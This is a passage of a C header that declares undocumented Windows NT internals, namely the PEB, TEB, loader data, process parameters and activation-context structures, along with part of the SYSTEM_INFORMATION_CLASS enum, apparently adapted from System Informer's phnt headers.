struct _PEB_LDR_DATA 25 | { 26 | ULONG Length; 27 | BOOLEAN Initialized; 28 | HANDLE SsHandle; 29 | LIST_ENTRY InLoadOrderModuleList; 30 | LIST_ENTRY InMemoryOrderModuleList; 31 | LIST_ENTRY InInitializationOrderModuleList; 32 | PVOID EntryInProgress; 33 | BOOLEAN ShutdownInProgress; 34 | HANDLE ShutdownThreadId; 35 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 36 | 37 | 38 | 39 | typedef struct _CURDIR 40 | { 41 | UNICODE_STRING DosPath; 42 | HANDLE Handle; 43 | } CURDIR, * PCURDIR; 44 | 45 | #define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 46 | #define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 47 | 48 | typedef struct _RTL_DRIVE_LETTER_CURDIR 49 | { 50 | USHORT Flags; 51 | USHORT Length; 52 | ULONG TimeStamp; 53 | STRING DosPath; 54 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 55 | 56 | #define RTL_MAX_DRIVE_LETTERS 32 57 | #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 58 | 59 | typedef struct _RTL_USER_PROCESS_PARAMETERS 60 | { 61 | ULONG MaximumLength; 62 | ULONG Length; 63 | 64 | ULONG Flags; 65 | ULONG DebugFlags; 66 | 67 | HANDLE ConsoleHandle; 68 | ULONG ConsoleFlags; 69 | HANDLE StandardInput; 70 | HANDLE StandardOutput; 71 | HANDLE StandardError; 72 | 73 | CURDIR CurrentDirectory; 74 | UNICODE_STRING DllPath; 75 | UNICODE_STRING ImagePathName; 76 | UNICODE_STRING CommandLine; 77 | PVOID Environment; 78 | 79 | ULONG StartingX; 80 | ULONG StartingY; 81 | ULONG CountX; 82 | ULONG CountY; 83 | ULONG CountCharsX; 84 | ULONG CountCharsY; 85 | ULONG FillAttribute; 86 | 87 | ULONG WindowFlags; 88 | ULONG ShowWindowFlags; 89 | UNICODE_STRING WindowTitle; 90 | UNICODE_STRING DesktopInfo; 91 | UNICODE_STRING ShellInfo; 92 | UNICODE_STRING RuntimeData; 93 | RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; 94 | 95 | ULONG_PTR EnvironmentSize; 96 | ULONG_PTR EnvironmentVersion; 97 | 98 | PVOID PackageDependencyData; 99 | ULONG ProcessGroupId; 100 | ULONG LoaderThreads; 101 | 102 | UNICODE_STRING RedirectionDllName; // REDSTONE4 103 | UNICODE_STRING 
HeapPartitionName; // 19H1 104 | ULONG_PTR DefaultThreadpoolCpuSetMasks; 105 | ULONG DefaultThreadpoolCpuSetMaskCount; 106 | ULONG DefaultThreadpoolThreadMaximum; 107 | ULONG HeapMemoryTypeMask; // WIN11 108 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 109 | 110 | 111 | typedef struct _API_SET_NAMESPACE 112 | { 113 | ULONG Version; 114 | ULONG Size; 115 | ULONG Flags; 116 | ULONG Count; 117 | ULONG EntryOffset; 118 | ULONG HashOffset; 119 | ULONG HashFactor; 120 | } API_SET_NAMESPACE, * PAPI_SET_NAMESPACE; 121 | 122 | 123 | #define GDI_HANDLE_BUFFER_SIZE32 34 124 | #define GDI_HANDLE_BUFFER_SIZE64 60 125 | 126 | #ifndef _WIN64 127 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 128 | #else 129 | #define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 130 | #endif 131 | 132 | typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; 133 | 134 | typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; 135 | typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; 136 | 137 | typedef struct _ACTIVATION_CONTEXT_DATA 138 | { 139 | ULONG Magic; 140 | ULONG HeaderSize; 141 | ULONG FormatVersion; 142 | ULONG TotalSize; 143 | ULONG DefaultTocOffset; // to ACTIVATION_CONTEXT_DATA_TOC_HEADER 144 | ULONG ExtendedTocOffset; // to ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER 145 | ULONG AssemblyRosterOffset; // to ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER 146 | ULONG Flags; // ACTIVATION_CONTEXT_FLAG_* 147 | } ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA; 148 | 149 | 150 | typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY 151 | { 152 | ULONG Flags; 153 | UNICODE_STRING DosPath; 154 | HANDLE Handle; 155 | } ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY; 156 | 157 | typedef struct _ASSEMBLY_STORAGE_MAP 158 | { 159 | ULONG Flags; 160 | ULONG AssemblyCount; 161 | PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray; 162 | } ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP; 163 | 164 | typedef struct _PEB 165 | { 166 | BOOLEAN 
InheritedAddressSpace; 167 | BOOLEAN ReadImageFileExecOptions; 168 | BOOLEAN BeingDebugged; 169 | union 170 | { 171 | BOOLEAN BitField; 172 | struct 173 | { 174 | BOOLEAN ImageUsesLargePages : 1; 175 | BOOLEAN IsProtectedProcess : 1; 176 | BOOLEAN IsImageDynamicallyRelocated : 1; 177 | BOOLEAN SkipPatchingUser32Forwarders : 1; 178 | BOOLEAN IsPackagedProcess : 1; 179 | BOOLEAN IsAppContainer : 1; 180 | BOOLEAN IsProtectedProcessLight : 1; 181 | BOOLEAN IsLongPathAwareProcess : 1; 182 | }; 183 | }; 184 | 185 | HANDLE Mutant; 186 | 187 | PVOID ImageBaseAddress; 188 | PPEB_LDR_DATA Ldr; 189 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 190 | PVOID SubSystemData; 191 | PVOID ProcessHeap; 192 | PRTL_CRITICAL_SECTION FastPebLock; 193 | PSLIST_HEADER AtlThunkSListPtr; 194 | PVOID IFEOKey; 195 | 196 | union 197 | { 198 | ULONG CrossProcessFlags; 199 | struct 200 | { 201 | ULONG ProcessInJob : 1; 202 | ULONG ProcessInitializing : 1; 203 | ULONG ProcessUsingVEH : 1; 204 | ULONG ProcessUsingVCH : 1; 205 | ULONG ProcessUsingFTH : 1; 206 | ULONG ProcessPreviouslyThrottled : 1; 207 | ULONG ProcessCurrentlyThrottled : 1; 208 | ULONG ProcessImagesHotPatched : 1; // REDSTONE5 209 | ULONG ReservedBits0 : 24; 210 | }; 211 | }; 212 | union 213 | { 214 | PVOID KernelCallbackTable; 215 | PVOID UserSharedInfoPtr; 216 | }; 217 | ULONG SystemReserved; 218 | ULONG AtlThunkSListPtr32; 219 | PAPI_SET_NAMESPACE ApiSetMap; 220 | ULONG TlsExpansionCounter; 221 | PVOID TlsBitmap; 222 | ULONG TlsBitmapBits[2]; 223 | 224 | PVOID ReadOnlySharedMemoryBase; 225 | PVOID SharedData; // HotpatchInformation 226 | PVOID* ReadOnlyStaticServerData; 227 | 228 | PVOID AnsiCodePageData; // PCPTABLEINFO 229 | PVOID OemCodePageData; // PCPTABLEINFO 230 | PVOID UnicodeCaseTableData; // PNLSTABLEINFO 231 | 232 | ULONG NumberOfProcessors; 233 | ULONG NtGlobalFlag; 234 | 235 | ULARGE_INTEGER CriticalSectionTimeout; 236 | SIZE_T HeapSegmentReserve; 237 | SIZE_T HeapSegmentCommit; 238 | SIZE_T 
HeapDeCommitTotalFreeThreshold; 239 | SIZE_T HeapDeCommitFreeBlockThreshold; 240 | 241 | ULONG NumberOfHeaps; 242 | ULONG MaximumNumberOfHeaps; 243 | PVOID* ProcessHeaps; // PHEAP 244 | 245 | PVOID GdiSharedHandleTable; // PGDI_SHARED_MEMORY 246 | PVOID ProcessStarterHelper; 247 | ULONG GdiDCAttributeList; 248 | 249 | PRTL_CRITICAL_SECTION LoaderLock; 250 | 251 | ULONG OSMajorVersion; 252 | ULONG OSMinorVersion; 253 | USHORT OSBuildNumber; 254 | USHORT OSCSDVersion; 255 | ULONG OSPlatformId; 256 | ULONG ImageSubsystem; 257 | ULONG ImageSubsystemMajorVersion; 258 | ULONG ImageSubsystemMinorVersion; 259 | KAFFINITY ActiveProcessAffinityMask; 260 | GDI_HANDLE_BUFFER GdiHandleBuffer; 261 | PVOID PostProcessInitRoutine; 262 | 263 | PVOID TlsExpansionBitmap; 264 | ULONG TlsExpansionBitmapBits[32]; 265 | 266 | ULONG SessionId; 267 | 268 | ULARGE_INTEGER AppCompatFlags; 269 | ULARGE_INTEGER AppCompatFlagsUser; 270 | PVOID pShimData; 271 | PVOID AppCompatInfo; // APPCOMPAT_EXE_DATA 272 | 273 | UNICODE_STRING CSDVersion; 274 | 275 | PACTIVATION_CONTEXT_DATA ActivationContextData; 276 | PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap; 277 | PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData; 278 | PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap; 279 | 280 | SIZE_T MinimumStackCommit; 281 | 282 | PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex) 283 | PVOID PatchLoaderData; 284 | PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO 285 | 286 | ULONG AppModelFeatureState; 287 | ULONG SpareUlongs[2]; 288 | 289 | USHORT ActiveCodePage; 290 | USHORT OemCodePage; 291 | USHORT UseCaseMapping; 292 | USHORT UnusedNlsField; 293 | 294 | PVOID WerRegistrationData; 295 | PVOID WerShipAssertPtr; 296 | 297 | union 298 | { 299 | PVOID pContextData; // WIN7 300 | PVOID pUnused; // WIN10 301 | PVOID EcCodeBitMap; // WIN11 302 | }; 303 | 304 | PVOID pImageHeaderHash; 305 | union 306 | { 307 | ULONG TracingFlags; 308 | struct 309 | { 310 | ULONG HeapTracingEnabled : 1; 
311 | ULONG CritSecTracingEnabled : 1; 312 | ULONG LibLoaderTracingEnabled : 1; 313 | ULONG SpareTracingBits : 29; 314 | }; 315 | }; 316 | ULONGLONG CsrServerReadOnlySharedMemoryBase; 317 | PRTL_CRITICAL_SECTION TppWorkerpListLock; 318 | LIST_ENTRY TppWorkerpList; 319 | PVOID WaitOnAddressHashTable[128]; 320 | PVOID TelemetryCoverageHeader; // REDSTONE3 321 | ULONG CloudFileFlags; 322 | ULONG CloudFileDiagFlags; // REDSTONE4 323 | CHAR PlaceholderCompatibilityMode; 324 | CHAR PlaceholderCompatibilityModeReserved[7]; 325 | struct _LEAP_SECOND_DATA* LeapSecondData; // REDSTONE5 326 | union 327 | { 328 | ULONG LeapSecondFlags; 329 | struct 330 | { 331 | ULONG SixtySecondEnabled : 1; 332 | ULONG Reserved : 31; 333 | }; 334 | }; 335 | ULONG NtGlobalFlag2; 336 | ULONGLONG ExtendedFeatureDisableMask; // since WIN11 337 | } PEB, * PPEB; 338 | 339 | 340 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT 341 | { 342 | ULONG Flags; 343 | PSTR FrameName; 344 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT; 345 | 346 | typedef struct _TEB_ACTIVE_FRAME 347 | { 348 | ULONG Flags; 349 | struct _TEB_ACTIVE_FRAME* Previous; 350 | PTEB_ACTIVE_FRAME_CONTEXT Context; 351 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME; 352 | 353 | 354 | typedef struct _CLIENT_ID 355 | { 356 | HANDLE UniqueProcess; 357 | HANDLE UniqueThread; 358 | } CLIENT_ID, * PCLIENT_ID; 359 | 360 | 361 | typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)( 362 | IN ULONG NotificationType, // ACTIVATION_CONTEXT_NOTIFICATION_* 363 | IN struct _ACTIVATION_CONTEXT* ActivationContext, 364 | IN PACTIVATION_CONTEXT_DATA ActivationContextData, 365 | _In_opt_ PVOID NotificationContext, 366 | _In_opt_ PVOID NotificationData, 367 | _Inout_ PBOOLEAN DisableThisNotification 368 | ); 369 | 370 | typedef struct _ACTIVATION_CONTEXT 371 | { 372 | LONG RefCount; 373 | ULONG Flags; 374 | PACTIVATION_CONTEXT_DATA ActivationContextData; 375 | PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine; 376 | PVOID NotificationContext; 377 | 
ULONG SentNotifications[8]; 378 | ULONG DisabledNotifications[8]; 379 | ASSEMBLY_STORAGE_MAP StorageMap; 380 | PASSEMBLY_STORAGE_MAP_ENTRY InlineStorageMapEntries[32]; 381 | } ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT; 382 | 383 | 384 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME 385 | { 386 | struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous; 387 | PACTIVATION_CONTEXT ActivationContext; 388 | ULONG Flags; // RTL_ACTIVATION_CONTEXT_STACK_FRAME_FLAG_* 389 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME; 390 | 391 | typedef struct _ACTIVATION_CONTEXT_STACK 392 | { 393 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; 394 | LIST_ENTRY FrameListCache; 395 | ULONG Flags; // ACTIVATION_CONTEXT_STACK_FLAG_* 396 | ULONG NextCookieSequenceNumber; 397 | ULONG StackId; 398 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK; 399 | 400 | 401 | #define GDI_BATCH_BUFFER_SIZE 310 402 | 403 | typedef struct _GDI_TEB_BATCH 404 | { 405 | ULONG Offset; 406 | ULONG_PTR HDC; 407 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; 408 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH; 409 | 410 | typedef struct _TEB 411 | { 412 | NT_TIB NtTib; 413 | 414 | PVOID EnvironmentPointer; 415 | CLIENT_ID ClientId; 416 | PVOID ActiveRpcHandle; 417 | PVOID ThreadLocalStoragePointer; 418 | PPEB ProcessEnvironmentBlock; 419 | 420 | ULONG LastErrorValue; 421 | ULONG CountOfOwnedCriticalSections; 422 | PVOID CsrClientThread; 423 | PVOID Win32ThreadInfo; 424 | ULONG User32Reserved[26]; 425 | ULONG UserReserved[5]; 426 | PVOID WOW32Reserved; 427 | LCID CurrentLocale; 428 | ULONG FpSoftwareStatusRegister; 429 | PVOID ReservedForDebuggerInstrumentation[16]; 430 | #ifdef _WIN64 431 | PVOID SystemReserved1[30]; 432 | #else 433 | PVOID SystemReserved1[26]; 434 | #endif 435 | 436 | CHAR PlaceholderCompatibilityMode; 437 | BOOLEAN PlaceholderHydrationAlwaysExplicit; 438 | CHAR PlaceholderReserved[10]; 439 | 440 | ULONG ProxiedProcessId; 441 | ACTIVATION_CONTEXT_STACK ActivationStack; 442 | 
443 | UCHAR WorkingOnBehalfTicket[8]; 444 | NTSTATUS ExceptionCode; 445 | 446 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer; 447 | ULONG_PTR InstrumentationCallbackSp; 448 | ULONG_PTR InstrumentationCallbackPreviousPc; 449 | ULONG_PTR InstrumentationCallbackPreviousSp; 450 | #ifdef _WIN64 451 | ULONG TxFsContext; 452 | #endif 453 | 454 | BOOLEAN InstrumentationCallbackDisabled; 455 | #ifdef _WIN64 456 | BOOLEAN UnalignedLoadStoreExceptions; 457 | #endif 458 | #ifndef _WIN64 459 | UCHAR SpareBytes[23]; 460 | ULONG TxFsContext; 461 | #endif 462 | GDI_TEB_BATCH GdiTebBatch; 463 | CLIENT_ID RealClientId; 464 | HANDLE GdiCachedProcessHandle; 465 | ULONG GdiClientPID; 466 | ULONG GdiClientTID; 467 | PVOID GdiThreadLocalInfo; 468 | ULONG_PTR Win32ClientInfo[62]; 469 | PVOID glDispatchTable[233]; 470 | ULONG_PTR glReserved1[29]; 471 | PVOID glReserved2; 472 | PVOID glSectionInfo; 473 | PVOID glSection; 474 | PVOID glTable; 475 | PVOID glCurrentRC; 476 | PVOID glContext; 477 | 478 | NTSTATUS LastStatusValue; 479 | UNICODE_STRING StaticUnicodeString; 480 | WCHAR StaticUnicodeBuffer[261]; 481 | 482 | PVOID DeallocationStack; 483 | PVOID TlsSlots[64]; 484 | LIST_ENTRY TlsLinks; 485 | 486 | PVOID Vdm; 487 | PVOID ReservedForNtRpc; 488 | PVOID DbgSsReserved[2]; 489 | 490 | ULONG HardErrorMode; 491 | #ifdef _WIN64 492 | PVOID Instrumentation[11]; 493 | #else 494 | PVOID Instrumentation[9]; 495 | #endif 496 | GUID ActivityId; 497 | 498 | PVOID SubProcessTag; 499 | PVOID PerflibData; 500 | PVOID EtwTraceData; 501 | PVOID WinSockData; 502 | ULONG GdiBatchCount; 503 | 504 | union 505 | { 506 | PROCESSOR_NUMBER CurrentIdealProcessor; 507 | ULONG IdealProcessorValue; 508 | struct 509 | { 510 | UCHAR ReservedPad0; 511 | UCHAR ReservedPad1; 512 | UCHAR ReservedPad2; 513 | UCHAR IdealProcessor; 514 | }; 515 | }; 516 | 517 | ULONG GuaranteedStackBytes; 518 | PVOID ReservedForPerf; 519 | PVOID ReservedForOle; // tagSOleTlsData 520 | ULONG WaitingOnLoaderLock; 521 | PVOID 
SavedPriorityState; 522 | ULONG_PTR ReservedForCodeCoverage; 523 | PVOID ThreadPoolData; 524 | PVOID* TlsExpansionSlots; 525 | #ifdef _WIN64 526 | PVOID DeallocationBStore; 527 | PVOID BStoreLimit; 528 | #endif 529 | ULONG MuiGeneration; 530 | ULONG IsImpersonating; 531 | PVOID NlsCache; 532 | PVOID pShimData; 533 | ULONG HeapData; 534 | HANDLE CurrentTransactionHandle; 535 | PTEB_ACTIVE_FRAME ActiveFrame; 536 | PVOID FlsData; 537 | 538 | PVOID PreferredLanguages; 539 | PVOID UserPrefLanguages; 540 | PVOID MergedPrefLanguages; 541 | ULONG MuiImpersonation; 542 | 543 | union 544 | { 545 | USHORT CrossTebFlags; 546 | USHORT SpareCrossTebBits : 16; 547 | }; 548 | union 549 | { 550 | USHORT SameTebFlags; 551 | struct 552 | { 553 | USHORT SafeThunkCall : 1; 554 | USHORT InDebugPrint : 1; 555 | USHORT HasFiberData : 1; 556 | USHORT SkipThreadAttach : 1; 557 | USHORT WerInShipAssertCode : 1; 558 | USHORT RanProcessInit : 1; 559 | USHORT ClonedThread : 1; 560 | USHORT SuppressDebugMsg : 1; 561 | USHORT DisableUserStackWalk : 1; 562 | USHORT RtlExceptionAttached : 1; 563 | USHORT InitialThread : 1; 564 | USHORT SessionAware : 1; 565 | USHORT LoadOwner : 1; 566 | USHORT LoaderWorker : 1; 567 | USHORT SkipLoaderInit : 1; 568 | USHORT SkipFileAPIBrokering : 1; 569 | }; 570 | }; 571 | 572 | PVOID TxnScopeEnterCallback; 573 | PVOID TxnScopeExitCallback; 574 | PVOID TxnScopeContext; 575 | ULONG LockCount; 576 | LONG WowTebOffset; 577 | PVOID ResourceRetValue; 578 | PVOID ReservedForWdf; 579 | ULONGLONG ReservedForCrt; 580 | GUID EffectiveContainerId; 581 | ULONGLONG LastSleepCounter; // Win11 582 | ULONG SpinCallCount; 583 | ULONGLONG ExtendedFeatureDisableMask; 584 | } TEB, * PTEB; 585 | 586 | 587 | 588 | 589 | // https://github.com/winsiderss/systeminformer/blob/master/phnt/include/ntexapi.h#L1324 590 | typedef enum _SYSTEM_INFORMATION_CLASS 591 | { 592 | SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION 593 | SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION 
594 | SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION 595 | SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION 596 | SystemPathInformation, // not implemented 597 | SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 598 | SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION 599 | SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION 600 | SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION (EX in: USHORT ProcessorGroup) 601 | SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION 602 | SystemCallTimeInformation, // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10 603 | SystemModuleInformation, // q: RTL_PROCESS_MODULES 604 | SystemLocksInformation, // q: RTL_PROCESS_LOCKS 605 | SystemStackTraceInformation, // q: RTL_PROCESS_BACKTRACES 606 | SystemPagedPoolInformation, // not implemented 607 | SystemNonPagedPoolInformation, // not implemented 608 | SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION 609 | SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION 610 | SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION 611 | SystemVdmInstemulInformation, // q: SYSTEM_VDM_INSTEMUL_INFO 612 | SystemVdmBopInformation, // not implemented // 20 613 | SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache) 614 | SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION 615 | SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION (EX in: USHORT ProcessorGroup) 616 | SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege) 617 | SystemFullMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION 618 | SystemLoadGdiDriverInformation, // s (kernel-mode only) 619 | SystemUnloadGdiDriverInformation, // s (kernel-mode only) 620 | 
SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege) 621 | SystemSummaryMemoryInformation, // not implemented // SYSTEM_MEMORY_USAGE_INFORMATION 622 | SystemMirrorMemoryInformation, // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30 623 | SystemPerformanceTraceInformation, // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS) 624 | SystemObsolete0, // not implemented 625 | SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION 626 | SystemCrashDumpStateInformation, // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege) 627 | SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION 628 | SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION 629 | SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege) 630 | SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only 631 | SystemPrioritySeperation, // s (requires SeTcbPrivilege) 632 | SystemVerifierAddDriverInformation, // s (requires SeDebugPrivilege) // 40 633 | SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege) 634 | SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION (EX in: USHORT ProcessorGroup) 635 | SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION 636 | SystemCurrentTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION 637 | SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION 638 | SystemTimeSlipNotification, // s: HANDLE (NtCreateEvent) (requires SeSystemtimePrivilege) 639 | SystemSessionCreate, // not implemented 640 | SystemSessionDetach, // not implemented 641 | SystemSessionInformation, // not implemented (SYSTEM_SESSION_INFORMATION) 642 | SystemRangeStartInformation, // q: SYSTEM_RANGE_START_INFORMATION // 50 643 | 
SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege) 644 | SystemVerifierThunkExtend, // s (kernel-mode only) 645 | SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION 646 | SystemLoadGdiDriverInSystemSpace, // s: SYSTEM_GDI_DRIVER_INFORMATION (kernel-mode only) (same as SystemLoadGdiDriverInformation) 647 | SystemNumaProcessorMap, // q: SYSTEM_NUMA_INFORMATION 648 | SystemPrefetcherInformation, // q; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation 649 | SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION 650 | SystemRecommendedSharedDataAlignment, // q: ULONG // KeGetRecommendedSharedDataAlignment 651 | SystemComPlusPackage, // q; s: ULONG 652 | SystemNumaAvailableMemory, // q: SYSTEM_NUMA_INFORMATION // 60 653 | SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION (EX in: USHORT ProcessorGroup) 654 | SystemEmulationBasicInformation, // q: SYSTEM_BASIC_INFORMATION 655 | SystemEmulationProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION 656 | SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX 657 | SystemLostDelayedWriteInformation, // q: ULONG 658 | SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION 659 | SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION 660 | SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION 661 | SystemHotpatchInformation, // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION 662 | SystemObjectSecurityMode, // q: ULONG // 70 663 | SystemWatchdogTimerHandler, // s: SYSTEM_WATCHDOG_HANDLER_INFORMATION // (kernel-mode only) 664 | SystemWatchdogTimerInformation, // q: SYSTEM_WATCHDOG_TIMER_INFORMATION // (kernel-mode only) 665 | SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION (EX in: USHORT ProcessorGroup) 666 | SystemWow64SharedInformationObsolete, // not implemented 667 | SystemRegisterFirmwareTableInformationHandler, // s: 
SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only) 668 | SystemFirmwareTableInformation, // SYSTEM_FIRMWARE_TABLE_INFORMATION 669 | SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX 670 | SystemVerifierTriageInformation, // not implemented 671 | SystemSuperfetchInformation, // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation 672 | SystemMemoryListInformation, // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80 673 | SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation) 674 | SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege) 675 | SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[] (EX in: USHORT ProcessorGroup) 676 | SystemVerifierCancellationInformation, // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation 677 | SystemProcessorPowerInformationEx, // not implemented 678 | SystemRefTraceInformation, // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation 679 | SystemSpecialPoolInformation, // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0 680 | SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION 681 | SystemErrorPortInformation, // s (requires SeTcbPrivilege) 682 | SystemBootEnvironmentInformation, // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90 683 | SystemHypervisorInformation, // q: SYSTEM_HYPERVISOR_QUERY_INFORMATION 684 | SystemVerifierInformationEx, // q; s: SYSTEM_VERIFIER_INFORMATION_EX 685 | SystemTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) 686 | SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires 
SeTcbPrivilege) 687 | SystemCoverageInformation, // q: COVERAGE_MODULES s: COVERAGE_MODULE_REQUEST // ExpCovQueryInformation (requires SeDebugPrivilege) 688 | SystemPrefetchPatchInformation, // SYSTEM_PREFETCH_PATCH_INFORMATION 689 | SystemVerifierFaultsInformation, // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege) 690 | SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION 691 | SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION 692 | SystemProcessorPerformanceDistribution, // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION (EX in: USHORT ProcessorGroup) // 100 693 | SystemNumaProximityNodeInformation, // q; s: SYSTEM_NUMA_PROXIMITY_MAP 694 | SystemDynamicTimeZoneInformation, // q; s: RTL_DYNAMIC_TIME_ZONE_INFORMATION (requires SeTimeZonePrivilege) 695 | SystemCodeIntegrityInformation, // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation 696 | SystemProcessorMicrocodeUpdateInformation, // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION 697 | SystemProcessorBrandString, // q: CHAR[] 